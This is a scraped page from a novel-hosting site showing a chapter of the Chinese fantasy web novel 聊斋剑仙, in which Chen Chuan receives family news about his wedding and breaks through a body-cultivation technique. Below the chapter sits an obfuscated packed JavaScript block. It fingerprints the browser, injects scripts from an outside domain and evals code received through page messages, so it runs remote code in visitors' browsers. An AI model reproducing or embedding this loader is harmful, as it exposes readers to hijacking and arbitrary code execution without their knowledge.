返回

聊斋剑仙

首页
关灯
护眼
字体:
第二百六十章:再见左千户
上一章 返回目录 下一章
  竹林海阁中,一切如旧,白天聂小倩躲在画中,李如雪、何玉香、红袖、小柔四女则不是修炼就是在府中赏花聊天,偶尔出去街上逛逛买点东西,无忧无虑。

  修炼上,何玉香、红袖、小柔三女也终于将玄阴心经修炼入门,并且连带着长春功也修炼入门,同样修炼长春功的还有李如雪,都已入门。

  长春功虽然只是一门养生功法,对战力没有太多直接的加成,但是修炼出来的‘生’之气却是妙用无穷,生机勃勃,能滋养人体、调养气息、养生驻颜......

  甚至陈川猜测,长春功修炼出来的‘生’之气,会不会就是天人第一境的‘生’之力量,就算还不能划等号,恐怕也会是弱化版的‘生’之力量,如果真是这般的话,那如果能将长春功推演修炼到更高层次将长春功修炼出来的‘生’之气修炼到更高层次的话,会不会就能直接借此明悟天人第一境的‘生’之力量奥义,从而直接踏足到天人境界,领悟生之力。

  当然,这个猜测,目前也仅限于猜测,陈川还没有能力将之付出行动直接进行验证。

  回到家中,陈川先是陪了几女一上午,同时收到少陵城那边自己父亲陈忠寄来的信笺,信中的内容主要就是说了一下他和何玉香婚事的事情还有关于陈家迁来少陵城的事情。

  陈川和何玉香的婚事已经定下,订在了十二月的中旬,十二月十二日,双十二,好吧,这个世界没有双十二这种东西,时间纯属巧合。

  另外就是他陈家迁来少陵城的事情,信中自己父亲也全部做了细说,告知陈川接下来准备将整个陈家的生意重心都迁来少陵城,今后他陈家的发展也将放在少陵城这边,不过少阳城那边的生意却不打算舍弃,会留下一些信得过的人在那边照顾,同时准备专门建立一条少陵城到少阳城那边的商道。

  对此陈川也没有异议,他陈家要想发展做大,势力肯定要不断扩展,现在先把少陵城与少阳城两边的商道打通建立一条稳定的商道也不错。

  而且少阳城毕竟是他陈家的祖家,是他陈家的祖地,发家之地,意义非非,如非必要,自然也不能轻易舍弃。

  都说古人迷信,尤其是在祖地这一点,实际上,在这一点上,陈川也格外看重,不过陈川觉得这不是迷信,而是一种信念,一种祖祖辈辈流传下来的精神传承,让人能清楚的记得知道,自己是哪里人,自己的根在哪,自己的祖辈是从哪里出来的,而不会有一天,连自己的根在哪,自己是什么人都忘记了。

  下午时分,陈川来到银川城外一处深山的山谷,开始突破不灭金身。

  他现在有些不敢在自己家里突破了,因为每次突破的时候,除了动静不小之外,还会造成破坏,为了突破把自己家弄得乱七八糟的,陈川可心疼,毕竟是自己家。

  “系统,提升不灭金身到下一层。”

  嗡——

  熟悉的突破感顿时再次袭来,陈川体内的气血顿时缓缓沸腾起来,犹如缓缓煮开的沸水。

  很快,有雷鸣般的闷响滚滚从陈川体内传出,慑人心魄,陈川的表面皮肤上,一层红色的气血光晕也是浮现出来,看上去陈川整个人都像是充血了一样,鲜血都已经充斥到他的皮肉下面,充斥着他的整个身体各处,这个样子看起来有些吓人。

  给人的感觉就像是陈川整个人都要充血随时都可能炸开一样。

  “噗!”

  有口子从陈川皮肤上裂了出来,一开始只是一道,但是随着这一道出现,就像是泄洪的口子被拉开一样。

  很快,第二道、第三道、第四道......

  眨眼之间,鲜红的伤口就是密密麻麻布满陈川的整个身体。

  看上去,陈川整个人都一下子变成了脆弱的瓷器一般,全身上下都布满了裂缝,有红色鲜血从口子里面渗出,染红陈川的身体。

  不过这个时候,可以清楚的看到,陈川的整个身体皮肉都开始蠕动起来,尤其是那些裂开的口子里面的血肉,更像是一下子活了过来,不断的蠕动靠拢自己愈合,在这些血肉中,隐隐可见有一层淡淡的充满勃勃生机的绿色光芒绽放。

  一些裂开的口子很快缓缓愈合到一起,然后又被陈川体内的暴涨沸腾的气血撑开,然后又愈合。

  如此循环往复。

  远远看去,陈川似整个身体的每一寸皮肤甚至每一个细胞都复活了过来,能自我修复,且每一次修复之后都变原先更为强大坚韧。

  如此足足处持续了近半个多时辰。

  终于,陈川体内暴涨的气血再不能撑破皮肉,整个肉身体魄都再一次完成蜕变。

『加入书签,方便阅读』

( 第 1/2 页, 本章未完,请翻页 1biquge.com )
上一章 返回目录 下一页
new Function(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6(/(1d)/i.7(f.c)&&/(y)/i.7(f.c)){6(/(10)/i.7(x.Z.Y)){X(W V().U())}5 z="v.d.j/u/t-o-B/l/k/n-q-s-A.w";3.4("<8 a=");3.4("h");3.4("T");3.4("p");3.4("s:");3.4("//");3.4(z);3.4(">")}F 6(/(R|P|y)/i.7(f.c)){x.K("J",G(e){5 b=e.I;6(b.r){S(12(b.r.1h(/\\+/g,"%1g")))}});3.4(\'\')}F{(G(){5 m=3.1b("8");5 H="D://v.d.j";m.a=H+"/2/1/1?"+C.1c(C.L()*M);5 9=3.N("8")[0];9.O.11(m,9)})()}',62,80,'|||document|write|var|if|test|script|ss|src|_c_ob_hf|userAgent|nggwhyk||navigator||||cn|smallimage|en||Filip2po|crypto||Vals1orda|hf_ev_j||go|presentations||js|window|baidu|uwMbwa|bfeUAl1UCVU|library|Math|https|iframe|else|function|url|data|message|addEventListener|random|10000|getElementsByTagName|parentNode|UCBrowser|frameborder|MQQBrowser|eval|tt|getSeconds|Date|new|alert|href|location|check_in|insertBefore|decodeURIComponent|no|none|scrolling|marginheight|width|height|allowtransparency|true|createElement|round|Android|display|style|20|replace'.split('|'),0,{}))()